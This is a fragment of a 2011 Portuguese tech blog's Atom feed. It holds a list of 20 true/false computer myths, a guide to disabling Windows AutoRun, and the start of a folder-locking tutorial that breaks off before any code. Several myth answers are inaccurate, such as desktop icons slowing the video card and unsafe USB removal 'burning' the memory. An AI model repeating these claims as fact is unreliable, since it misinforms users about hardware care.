&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/y6EuaJelpBcOPcpiYR-T_0rf610/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/y6EuaJelpBcOPcpiYR-T_0rf610/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/y6EuaJelpBcOPcpiYR-T_0rf610/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/y6EuaJelpBcOPcpiYR-T_0rf610/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/TFyXVJ4dHb0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/7620616279836996520/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/bombas.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/7620616279836996520?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/7620616279836996520?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/TFyXVJ4dHb0/bombas.html" title="Bombas .!" /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/bombas.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEAQnY6fyp7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-7773800320220864730</id><published>2011-03-23T06:45:00.001-07:00</published><updated>2011-03-24T06:17:23.817-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T06:17:23.817-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="." /><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>20 Coisas que vc deve saber em um Computador .</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;&lt;span style="color: #ff6600;"&gt;1. Faz mal ao computador ter ímãs colados no gabinete.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Verdadeiro.”Imãs no gabinete podem afetar o HD, onde os dados são gravados magneticamente.&lt;br /&gt;
Na verdade esse é o maior problema dos imãs”.Gladiador.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;2. Empurrar o cd com o dedo para inseri-lo no gabinete é prejudicial ao equipamento.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Falso. Nada a ver. Nada irá acontecer se você empurrar com uma força&lt;br /&gt;
normal. Foi feito exatamente para isso. Mas se empurrar com força excessiva, vai fazer as partes mecânicas girarem muito mais rápido do que o normal, e poderá danificar o drive.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;3. Água ou café derramada sobre o teclado pode arruinar seu funcionamento.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Verdadeiro. Estragam as trilhas metalizadas que estão embaixo das&lt;br /&gt;
teclas. Podem criar um curto-circuito e queimar.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;4. É necessário ter espaço entre o monitor e a parede atrás dele.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Falso. Monitor não é geladeira. O ambiente em geral deve estar&lt;br /&gt;
ventilado, mas não é indispensável que seja muita a distância. É muito pior&lt;br /&gt;
ter outro monitor atrás (como acontece em muitos escritórios) porque pode&lt;br /&gt;
haver o risco de ter interferências entre os computadores.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;5. Quando o computador passou a noite toda ligado, é melhor desliga-lo e voltar a reiniciar.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Falso. Pode seguir ligado sem problema algum. Ainda que pareça o&lt;br /&gt;
contrário e dê vontade de desliga-lo um momento para que descanse, seguindo&lt;br /&gt;
a lógica humana, o HD dura muito mais se permanecer ligado e não sendo o&lt;br /&gt;
tempo todo ligado e desligado. Por uma questão de economia de energia, não&lt;br /&gt;
convém deixar ligado por vários dias, mas se não levarmos em conta o fator&lt;br /&gt;
do aquecimento global seria muito melhor para o PC nunca desliga-lo. Eles&lt;br /&gt;
foram criados para isso.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;6. Gasta mais energia ao ser ligado do que em várias horas de uso.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Falso. Ao ligar não consome tanto como para superar as horas de&lt;br /&gt;
funcionamento. Ao desligar poupa-se energia e se permanecer ligado gasta,&lt;br /&gt;
como qualquer outro eletrodoméstico.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;7. Faz mal ao computador ter algum celular por perto.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Falso. Sem problema algum, no máximo um ronco provocado pela&lt;br /&gt;
interferência de uma chamada.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;8. Depois de desligar o computador é melhor deixa-lo descansar uns segundos antes de voltar a ligar.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Verdadeiro. É recomendável esperar no mínimo alguns segundos antes de&lt;br /&gt;
voltar a liga-lo. 10 segundos deve ser o suficiente.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;9. Mover o gabinete quando o computador está ligado pode queimar o HD.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Falso. A força centrífuga com que gira o HD é tanta que não acontece&lt;br /&gt;
nada ao se mover o gabinete. Muito menos ainda em se tratando de um notebook,&lt;br /&gt;
porque eles foram feitos para isso. Mas é lógico que você não vai sair por&lt;br /&gt;
aí dando porrada no equipamento, né?&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;10. Pelo bem do monitor, é conveniente usar protetor de tela quando não está em uso.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Verdadeiro. Porque o mecanismo do protetor de tela faz com que o&lt;br /&gt;
desgaste das cores da tela seja uniforme. Ao renovar as imagens&lt;br /&gt;
constantemente, não se gasta num mesmo lugar.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;11. Quando há chuva forte, é absolutamente necessário tirar o plugue do computador da tomada.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Verdadeiro. Deveria ser adotado como uma obrigação no caso de uma chuva&lt;br /&gt;
muito forte, com muitos raios e trovões. Da mesma forma, é aconselhável&lt;br /&gt;
retirar os cabos do telefone e da alimentação do modem para que não queimem&lt;br /&gt;
com a descarga de raios.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;12. Não é conveniente olhar a luz vermelha que está embaixo do mouse óptico.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Verdadeiro. Pode até não deixar ninguém cego, mas é uma luz bastante&lt;br /&gt;
forte que pode sim fazer mal a retina.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;13. Nos notebooks deve-se acoplar primeiro o cabo de eletricidade à máquina e somente depois esse cabo a tomada.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Falso. Tanto faz. Quase todos os equipamentos portáteis atuais tem&lt;br /&gt;
proteção de curto-circuito e são multi-voltagem, podem ser ligados em&lt;br /&gt;
tensões de 90 a 240 volts, pelo que são sumamente estáveis.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;14. Ao desligar o computador convém também desligar o monitor.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Falso. Outra vez, tanto faz. Ao desligar o computador, o monitor fica num&lt;br /&gt;
estado em que consome muito pouca energia (pouca coisa mais que 1W) e não&lt;br /&gt;
sofre desgaste algum. A decisão termina sendo em função da economia, ainda&lt;br /&gt;
que o consumo seja realmente mínimo.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;15. Não se deve colocar cds, disquetes ou qualquer outro elemento sobre o gabinete.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Falso. Lógico, nada do que é colocado sobre o gabinete pode ser afetado ou&lt;br /&gt;
avariado, a não ser que esteja úmida e a água possa chegar ao equipamento.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;16. O computador nunca pode ficar ao sol.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Verdadeiro. Se ele esquentar mais do que o habitual, sua vida útil tende&lt;br /&gt;
a decrescer. Por isso nunca é boa idéia instalar o PC próximo a janelas onde&lt;br /&gt;
bate o sol.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;17. Se mais de 80% do HD tiver sendo usado, a máquina se torna mais lenta.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Verdadeiro. Sempre é uma questão de porcentagem. Por mais que se tenha&lt;br /&gt;
20 Gb livres, se for menos de 20% da capacidade do disco, o funcionamento do&lt;br /&gt;
computador será lento.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;18. Não se deve tirar o pen drive sem avisar à máquina.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Verdadeiro. Deve ser selecionada a opção ‘Retirar hardware com&lt;br /&gt;
segurança’ antes de retira-lo. Caso contrário, corre-se o risco de queimar a&lt;br /&gt;
memória do USB.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;19. Ter o desktop cheio de ícones deixa o computador mais lento.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Verdadeiro. Não importa se são ícones de programas ou arquivos. O que&lt;br /&gt;
acontece é que a placa de vídeo do computador renova constantemente a&lt;br /&gt;
informação apresentada na tela, e quanto mais ícones, mais tempo.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #ff6600;"&gt;20. Desligar a máquina diretamente no botão, sem selecionar previamente a opção de desligar o equipamento, estraga o HD.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Verdadeiro. O HD pode queimar ao ser desligado enquanto ele ainda está&lt;br /&gt;
lendo ou escrevendo em alguma parte do sistema. Ademais, quando a energia é&lt;br /&gt;
desligada subitamente, as placas que cobrem o disco (que gira até 10 mil&lt;br /&gt;
rotações) descem sobre ele e podem ir riscando até que alcancem a posição de&lt;br /&gt;
descanso. Ao selecionar a opção ‘Desligar o Computador’, todo o sistema se&lt;br /&gt;
prepara para repousar e suspende todas as atividades. Cada peça vai ficar em&lt;br /&gt;
seu devido lugar.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-7773800320220864730?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/32C9mtIz06B03mWy-FpK9LCaJYI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/32C9mtIz06B03mWy-FpK9LCaJYI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/32C9mtIz06B03mWy-FpK9LCaJYI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/32C9mtIz06B03mWy-FpK9LCaJYI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/_QVBZInhA-g" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/7773800320220864730/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/20-coisas-que-vc-deve-saber-em-um.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/7773800320220864730?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/7773800320220864730?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/_QVBZInhA-g/20-coisas-que-vc-deve-saber-em-um.html" title="20 Coisas que vc deve saber em um Computador ." /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/20-coisas-que-vc-deve-saber-em-um.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEAQnY6cCp7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-5808091597629123967</id><published>2011-03-23T06:42:00.001-07:00</published><updated>2011-03-24T06:17:23.818-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T06:17:23.818-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="." /><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Desativando o AUTORUM .</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;&lt;span style="font-weight: bold;"&gt;O que é o AutoRun?&lt;/span&gt;&lt;br /&gt;
Traduzindo fica mais ou menos como "Rodar automaticamente", e é isso que ele faz, quando você conecta um PenDrive, uma câmera ou coloca um DC/DVD no drive, normalmente aparece esta caixinha na tela:&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;img alt="AutoRun ScreenShot" src="http://www.compudicas.com/wp-content/uploads/2009/11/058.gif" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Ela lhe dá a opção de escolher como abrir o dispositivo/arquivo, ou às vezes nem lhe oferece opção e já sai abrindo o arquivo. Isso ocorre muito em CD-ROMs de jogos.&lt;br /&gt;
&lt;br /&gt;
Mas alám de as vezes ficar meio lento o AutoRun pode representar um perigo. Imagine que alguém lhe deu um CD ou PenDrive com um vírus e adicionou este vírus no AutoRun dele, logo, o PC irá executar o vírus.&lt;br /&gt;
&lt;br /&gt;
Muitas destas pragas hoje em dia se alojam nesses dispositivos para se proliferar nos computadores.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #cc33cc; font-size: 16px;"&gt;Como desativar o AutoRun:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #3366ff; font-weight: bold;"&gt;No Windows Vista&lt;/span&gt;: clique no Botão:&amp;nbsp;&lt;span style="font-weight: bold;"&gt;Iniciar&lt;/span&gt;&amp;nbsp;&amp;gt;&amp;nbsp;&lt;span style="font-weight: bold;"&gt;Painel de Controle&lt;/span&gt;&amp;nbsp;&amp;gt;&amp;nbsp;&lt;span style="font-weight: bold;"&gt;Hardwares e Sons&lt;/span&gt;. Em seguida, clique na opção “&lt;span style="font-weight: bold;"&gt;Reproduzir CDs ou outra mídia automaticamente&lt;/span&gt;” e&amp;nbsp;&lt;span style="font-weight: bold;"&gt;desabilite&lt;/span&gt;&amp;nbsp;a opção “&lt;span style="font-weight: bold;"&gt;Usar Reprodução Automática em todas as mídias e dispositivos&lt;/span&gt;”.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #3366ff; font-weight: bold;"&gt;No Windows XP&lt;/span&gt;: clique em:&amp;nbsp;&lt;span style="font-weight: bold;"&gt;Iniciar&lt;/span&gt;&amp;nbsp;&amp;gt;&amp;nbsp;&lt;span style="font-weight: bold;"&gt;Executar&lt;/span&gt;&amp;nbsp;&amp;gt; digite&amp;nbsp;&lt;span style="font-weight: bold;"&gt;gpedit.msc&lt;/span&gt;. Na janela que abrir, vá em “&lt;span style="font-weight: bold;"&gt;Configurações do computador&lt;/span&gt;” &amp;gt; “&lt;span style="font-weight: bold;"&gt;Modelos administrativos&lt;/span&gt;” &amp;gt; “&lt;span style="font-weight: bold;"&gt;Sistema&lt;/span&gt;”&amp;gt;“&lt;span style="font-weight: bold;"&gt;Desativar auto-executar&lt;/span&gt;”, dê um duplo clique e escolha&amp;nbsp;&lt;span style="font-weight: bold;"&gt;ativado&lt;/span&gt;&amp;nbsp;e dê&amp;nbsp;&lt;span style="font-weight: bold;"&gt;ok&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-5808091597629123967?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/3pfHnFc5ezaWeS8p2ka9ERVPTyY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/3pfHnFc5ezaWeS8p2ka9ERVPTyY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/3pfHnFc5ezaWeS8p2ka9ERVPTyY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/3pfHnFc5ezaWeS8p2ka9ERVPTyY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/jfH8afnw6Ew" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/5808091597629123967/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/desativando-o-autorum.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/5808091597629123967?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/5808091597629123967?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/jfH8afnw6Ew/desativando-o-autorum.html" title="Desativando o AUTORUM ." /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/desativando-o-autorum.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEAQnY6cCp7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-8202075602934230153</id><published>2011-03-23T06:40:00.001-07:00</published><updated>2011-03-24T06:17:23.818-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T06:17:23.818-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="." /><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Trancando Pasta com Senha .</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Aprenda a trancar pastas, crie um arquivo .txt e cole isso nele:&lt;br /&gt;
&lt;br /&gt;
&lt;em&gt;&lt;/em&gt;&lt;/div&gt;&lt;em&gt;&lt;div style="display: block; height: auto; overflow-x: hidden; overflow-y: hidden; width: inherit;"&gt;&lt;div class="syntaxhighlighter " id="highlighter_475632" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(231, 229, 220) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 1em !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 1em !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 1px !important; padding-left: 1px !important; padding-right: 1px !important; padding-top: 1px !important; position: relative !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: 728px;"&gt;&lt;div class="bar                                                           show" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;div class="toolbar" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-color: rgb(231, 229, 220) !important; border-bottom-style: solid !important; border-bottom-width: 1px !important; border-color: initial !important; border-left-color: rgb(231, 229, 220) !important; border-left-style: solid !important; border-left-width: 1px !important; border-right-color: rgb(231, 229, 220) !important; border-right-style: solid !important; border-right-width: 1px !important; border-style: initial !important; border-top-color: rgb(231, 229, 220) !important; border-top-style: solid !important; border-top-width: 1px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1px !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 8px !important; padding-left: 0px !important; padding-right: 8px !important; padding-top: 8px !important; position: absolute !important; right: 0px !important; text-align: left !important; top: 0px !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;a class="item viewSource" href="http://www.tudosobrehacker.com/tutoriais/iniciantes/273-trancando-pastas-com-senha#viewSource" style="background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/page_white_code.png) !important; background-repeat: no-repeat !important; color: rgb(160, 160, 160) !important; display: block !important; float: left !important; font-size: 11px; font-weight: normal; height: 16px; margin-left: 8px !important; outline-color: initial; outline-style: none; outline-width: initial; overflow-x: hidden !important; overflow-y: hidden !important; text-decoration: none; text-indent: -5000px !important; width: 16px;" title="view source"&gt;view source&lt;/a&gt;&lt;div class="item copyToClipboard" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 8px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; overflow-x: visible !important; overflow-y: visible !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: 0px !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;embed allowscriptaccess="always" flashvars="highlighterId=highlighter_475632" height="16" id="highlighter_475632_clipboard" menu="false" src="http://www.tudosobrehacker.com/plugins/content/codecitation/scripts/clipboard.swf" title="copy to clipboard" type="application/x-shockwave-flash" width="16" wmode="transparent"&gt;&lt;/embed&gt;&lt;/div&gt;&lt;a class="item printSource" href="http://www.tudosobrehacker.com/tutoriais/iniciantes/273-trancando-pastas-com-senha#printSource" style="background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/printer.png) !important; background-repeat: no-repeat !important; color: rgb(160, 160, 160) !important; display: block !important; float: left !important; font-size: 11px; font-weight: normal; height: 16px; margin-left: 8px !important; outline-color: initial; outline-style: none; outline-width: initial; overflow-x: hidden !important; overflow-y: hidden !important; text-decoration: none; text-indent: -5000px !important; width: 16px;" title="print"&gt;print&lt;/a&gt;&lt;a class="item about" href="http://www.tudosobrehacker.com/tutoriais/iniciantes/273-trancando-pastas-com-senha#about" style="background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/help.png) !important; background-repeat: no-repeat !important; color: rgb(160, 160, 160) !important; display: block !important; float: left !important; font-size: 11px; font-weight: normal; height: 16px; margin-left: 8px !important; outline-color: initial; outline-style: none; outline-width: initial; overflow-x: hidden !important; overflow-y: hidden !important; text-decoration: none; text-indent: -5000px !important; width: 16px;" title="?"&gt;?&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="lines" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;01.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px 